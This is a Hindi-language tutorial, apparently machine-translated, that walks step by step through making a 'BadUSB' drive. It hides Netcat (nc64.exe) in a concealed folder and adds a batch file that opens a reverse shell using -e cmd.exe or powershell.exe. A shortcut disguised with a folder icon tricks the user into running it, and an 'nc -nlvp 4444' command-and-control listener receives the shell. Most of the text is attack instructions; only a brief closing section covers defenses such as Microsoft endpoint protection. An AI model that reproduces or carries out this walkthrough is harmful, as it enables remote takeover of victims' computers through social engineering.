आपके कंप्यूटर को नुकसान पहुंचाने के लिए सभी दुर्भावनापूर्ण USB उपकरणों को परिष्कृत प्रोग्रामिंग के साथ महंगे हार्डवेयर के टुकड़े होने की आवश्यकता नहीं है। एक पुराने USB ड्राइव के साथ, आप लिंक करने और पेलोड करने के लिए Windows शॉर्टकट फ़ाइलों का उपयोग करके अपना स्वयं का दुर्भावनापूर्ण BadUSB बना सकते हैं। McAfee ब्लॉग पोस्ट के अनुसार, "2022 की दूसरी तिमाही के दौरान, McAfee Labs ने LNK फ़ाइलों का उपयोग करके वितरित किए जा रहे मैलवेयर में वृद्धि देखी है। हमलावर एलएनके की आसानी का फायदा उठा रहे हैं, और इसका इस्तेमाल एमोटेट, काकबोट, आईसेडआईडी, बाजारलोडर्स इत्यादि जैसे मैलवेयर देने के लिए कर रहे हैं। Rise of LNK (शॉर्टकट) मालवेयर हम इस बात पर गौर करने जा रहे हैं कि कैसे एक एलएनके फाइल एक मासूम दिखने वाली यूएसबी ड्राइव पर मैलवेयर डिलीवर कर सकती है। विंडोज शॉर्टकट फाइलों (एलएनके फाइलों) में हार्ड-टू-डिटेक्ट मालवेयर का लाभ उठाकर एक प्रच्छन्न लिंक उपयोगकर्ता को एक हानिरहित फ़ाइल पर क्लिक करने और मैलवेयर लॉन्च करने में हेरफेर करता है। एक एलएनके फ़ाइल शॉर्टकट प्रोग्राम के पूर्ण पथ को नेविगेट किए बिना निष्पादन योग्य फ़ाइलों तक त्वरित और आसान पहुंच प्रदान करता है। इस स्थिति में, एक मैलवेयर निष्पादन योग्य एक छिपी निर्देशिका में है। उपयोगकर्ता एक फ़ोल्डर पर क्लिक करता है, जो मैलवेयर लॉन्च करने वाले निष्पादन योग्य से लिंक होता है। इस कारनामे के लिए निष्पादन योग्य Netcat या बस है। nc नेटकैट मैलवेयर नहीं है, लेकिन विंडोज डिफेंडर इसे इस तरह से फ़्लैग करता है, इसलिए इस वॉकथ्रू के प्रयोजनों के लिए हम इसे मैलवेयर के रूप में संदर्भित करेंगे। नेटवर्क प्रशासकों द्वारा उपयोग किया जाता है और कई उपयोग करता है, नेटकैट एक सामान्य उपकरण है जो अन्य सुविधाओं के साथ, एक दूरस्थ कंप्यूटर को दूसरे से कनेक्ट करने की अनुमति देता है। रिवर्स शेल स्थापित करने के लिए नेटकैट का उपयोग करते हुए, हमलावर मशीन के पास शेल एक्सेस और पीड़ित के कंप्यूटर का पूर्ण नियंत्रण होता है। इस खंड के अंत में, हम एलएनके शॉर्टकट यूएसबी हमलों से खुद को बचाने के तरीकों के बारे में बात करते हैं। शुरुआत कैसे करें अपने कंप्यूटर में USB ड्राइव डालें। आप किसी भी विंडोज़-स्वरूपित यूएसबी ड्राइव का उपयोग कर सकते हैं। इस उदाहरण में हमारे पेलोड का आकार केवल 45K है इसलिए किसी भी ड्राइव को काम करना चाहिए। राइट-क्लिक करें और एक नया फ़ोल्डर बनाएं। आप जो चाहें इस फ़ोल्डर को नाम दे सकते हैं, लेकिन इस उदाहरण के लिए, हम उपयुक्त नामित निर्देशिका का उपयोग करेंगे। हम अंततः इस निर्देशिका को छिपा देंगे - इसे बाद में कैसे करना है इसके बारे में अधिक जानकारी। पेलोड आपके द्वारा अभी बनाया गया फ़ोल्डर खोलें। यह वह जगह है जहां हम अपना मैलवेयर इंस्टॉल करने जा रहे हैं। और फ़ाइल को इस फ़ोल्डर में कॉपी करें GitHub से nc64.exe निष्पादन योग्य डाउनलोड करें nc64.exe 'BadUSB' ड्राइव को कॉन्फ़िगर करना पेलोड को अपने ड्राइव पर कॉपी करने के बाद, आपको USB ड्राइव पर बैच फ़ाइल बनाने के साथ कुछ फ़ाइल सिस्टम परिवर्तन करने की आवश्यकता है। एक बैच फ़ाइल बनाएँ बैच फ़ाइल वह जगह है जहाँ आप कंप्यूटर को निष्पादित करने के लिए Windows आदेश जारी करते हैं। टेक्स्ट फ़ाइल बनाने के लिए विंडोज नोटपैड का उपयोग करें। इस फ़ाइल में एक ही कमांड है जो हमला शुरू करती है। इस उदाहरण में IP पता और पोर्ट को अपने हमलावर होस्ट से बदलें जो Netcat चला रहा है। पैरामीटर हमें यह निर्दिष्ट करने की अनुमति देता है कि हम कनेक्शन बनाने के लिए किस शेल का उपयोग करना चाहते हैं। विंडोज सिस्टम पर, हम या का उपयोग कर सकते हैं। बाद में, हम अपने लिनक्स सर्वर को कॉन्फ़िगर करेंगे जो पीड़ित के कंप्यूटर से कनेक्शन स्वीकार करेगा। -e cmd.exe powershell.exe फ़ाइल को एक्सटेंशन के साथ सहेजें, और जांचें कि 'इस प्रकार सहेजें:' 'सभी फ़ाइलें' पर सेट है। सुनिश्चित करें कि बैच फ़ाइल और निष्पादन योग्य एक ही निर्देशिका में हैं। .cmd पेलोड निर्देशिका में दो फ़ाइलें होनी चाहिए: निष्पादन योग्य और बैच फ़ाइल। शॉर्टकट बनाना इस हमले की सफलता का एक हिस्सा यह है कि हम एक विंडोज़ शॉर्टकट बना सकते हैं और एक छिपी निर्देशिका में मैलवेयर से लिंक कर सकते हैं। उपयोगकर्ता को हमारे मैलवेयर पर क्लिक करने के लिए प्राप्त करने के लिए, हमें उन्हें ऐसा करने के लिए छल करना होगा। उम्मीद है, अधिकांश उपयोगकर्ता अपने कंप्यूटर पर रैंडम एप्लिकेशन नहीं चलाना जानते हैं। लेकिन एक उपयोगकर्ता एक दिलचस्प नाम के साथ एक फ़ोल्डर खोलने का प्रयास करेगा। USB ड्राइव की रूट डायरेक्टरी पर राइट-क्लिक करके और शॉर्टकट का चयन करके शॉर्टकट बनाएं। पिछले चरण में आपके द्वारा बनाई गई बैच फ़ाइल का चयन करें। हमारे उदाहरण में, निर्देशिका से फ़ाइल और जारी रखने के लिए अगला क्लिक करें। पेलोड run_exploit.cmd शॉर्टकट को कुछ दिलचस्प नाम दें जिससे उपयोगकर्ता उस पर क्लिक कर सके और समाप्त पर क्लिक कर सके। हमारा नया बनाया गया लिंक सही नहीं लग रहा है, और यहां तक कि जिज्ञासु उपयोगकर्ताओं को भी आइकन पर क्लिक करने में संकोच करना चाहिए। सौभाग्य से, विंडोज एक सुविधा प्रदान करता है ताकि हम फाइलों और लिंक के लिए डिफ़ॉल्ट आइकन बदल सकें। लिंक पर राइट-क्लिक करें और गुण चुनें। आइकन बदलें बटन पर क्लिक करें। आइकन को फ़ोल्डर में बदलें। चेंज आइकन विंडो को बंद करने के लिए ओके पर क्लिक करें। परिवर्तन लागू करें बंद करने के लिए ठीक क्लिक करें और फ़ाइल गुण विंडो बंद करें। अब हमारा शॉर्टकट लिंक की तरह नहीं दिखता। नीचे बाईं ओर अभी भी पारंपरिक लिंक तीर है, लेकिन इसे जिज्ञासु उपयोगकर्ताओं द्वारा आकस्मिक निरीक्षण से गुजरना चाहिए। मैलवेयर फ़ोल्डर छुपाएं हम लगभग वहीँ हैं। दिखाई देने वाले फ़ोल्डर के साथ ड्राइव अभी भी सही नहीं दिखता है। हम ड्राइव को छिपाकर इसे ठीक करने जा रहे हैं। फ़ोल्डर पर राइट-क्लिक करें और गुण चुनें। पेलोड पेलोड हिडन चेकबॉक्स चुनें और परिवर्तनों को लागू करने के लिए ओके पर क्लिक करें और विंडो बंद करें 'इस फ़ोल्डर, सबफ़ोल्डर्स, फ़ाइलों में परिवर्तन लागू करें' सक्षम करें और ठीक क्लिक करें। ड्राइव सशस्त्र है और तैनात करने के लिए तैयार है। जब उपयोगकर्ता USB ड्राइव को अपने कंप्यूटर में सम्मिलित करता है, तो वे यही देखते हैं। साधारण दुर्भावनापूर्ण यूएसबी शॉर्टकट एक नियमित विंडोज फ़ोल्डर की तरह दिखता है और हानिरहित दिखता है। जब वे फ़ोल्डर को खोलने का प्रयास करते हैं, तो जिज्ञासु या अनदेखे उपयोगकर्ता दुर्भावनापूर्ण पेलोड लॉन्च करते हैं। लेकिन साधारण दुर्भावनापूर्ण BadUSB को परिनियोजित करने से पहले, हमें अपना कमांड-एंड-कंट्रोल सर्वर सेट करना होगा। कमांड-एंड-कंट्रोल सर्वर सेटअप हमारा कमांड-एंड-कंट्रोल (सी एंड सी) सर्वर एक हमलावर द्वारा नियंत्रित किया जाता है और मैलवेयर द्वारा समझौता किए गए कंप्यूटर से कमांड भेजने और प्राप्त करने के लिए उपयोग किया जाता है। इस कारनामे के लिए हमारा सर्वर एक उबंटू मशीन है जो स्थापित के साथ अप-टू-डेट सॉफ़्टवेयर चला रही है। नेटकैट यह उदाहरण (DNS का उपयोग न करें), (केवल आने वाले कनेक्शन के लिए सुनें), (वर्बोज़), और (पोर्ट नंबर) का उपयोग करता है। श्रोता को कमांड से प्रारंभ करें। सर्वर धैर्यपूर्वक पोर्ट 4444 पर आने वाले कनेक्शन की प्रतीक्षा करता है। -n -l -v -p nc -nlvp 4444 जब उपयोगकर्ता USB सम्मिलित करता है और शॉर्टकट पर क्लिक करता है, तो बैच फ़ाइल कमांड को IP पते और पोर्ट नंबर के साथ निष्पादित करती है जो हमने पहले आपूर्ति की थी। कनेक्शन त्वरित और प्रभावी है। nc64.exe इस बिंदु पर, मशीन से छेड़छाड़ की जाती है और हमलावर के पास पीड़ित के कंप्यूटर तक पूरी पहुंच होती है। हैकर ऐसे आदेश जारी कर सकता है जैसे कि वे सीधे टर्मिनल पर बैठे हों। इस भेद्यता के खिलाफ बचाव इस कारनामे के काम करने के लिए कई चीजों को सही करने की जरूरत है। आपको इसे ऐसे स्थान पर छोड़ना होगा जहां कोई इसे उठाएगा पीड़ित को सभी कंप्यूटर स्वच्छता को अनदेखा करने और इसे अपने कंप्यूटर में स्थापित करने की आवश्यकता है पीड़ित को विंडोज चलाने की जरूरत है पीड़ित का कंप्यूटर सभी अद्यतनों और लागू पैचों के साथ वर्तमान विंडोज़ चलाना चाहिए। नहीं पीड़ित को लिंक पर क्लिक करने के लिए पर्याप्त उत्सुक होना चाहिए, जो निर्देशिका में छिपे हुए मैलवेयर को निष्पादित करता है पेलोड यदि ये सभी परिस्थितियाँ हमलावर के लिए काम करती हैं, तो यह एक सफल रैंसमवेयर हमला होगा। इस तरह के अटैक में नंबर हमलावर के पक्ष में काम करते हैं। यदि किसी स्थान पर 100 BadUSB उपकरण गिराए जाते हैं, तो उन्हें शिकार बनने के लिए लिंक पर क्लिक करने के लिए केवल एक व्यक्ति की आवश्यकता होती है। Microsoft वायरस और ख़तरा सुरक्षा सक्षम करें एंडपॉइंट डिटेक्शन (ईडीआर) उपयोगकर्ताओं को दुर्भावनापूर्ण कोड चलाने से बचाने का बहुत अच्छा काम करता है। असामान्य व्यवहार के लिए विंडोज, वायरस और खतरे से सुरक्षा घड़ियों के सभी वर्तमान समर्थित संस्करणों में निर्मित। माइक्रोसॉफ्ट यदि हमारे पास वायरस और खतरा सुरक्षा सेटिंग्स सक्षम हैं, तो उपयोगकर्ता BadUSB डालने पर यह संदेश देखेंगे। Microsoft EDR फ़ाइल को क्वारंटाइन करेगा और यह अब ड्राइव पर नहीं होगा, हमला विफल हो जाएगा। नतीजतन, मैलवेयर हटा दिया जाता है और अब निष्पादित नहीं किया जा सकता है। संभावित पीड़ितों के लिए अच्छी खबर यह है कि ज्यादातर लोग अपने कंप्यूटर में एक यादृच्छिक यूएसबी डिवाइस प्लग नहीं करना जानते हैं, लेकिन अगर उन्होंने ऐसा किया, तो माइक्रोसॉफ्ट एंडपॉइंट सुरक्षा सॉफ्टवेयर दुर्भावनापूर्ण सॉफ़्टवेयर को चलने से रोक देगा।
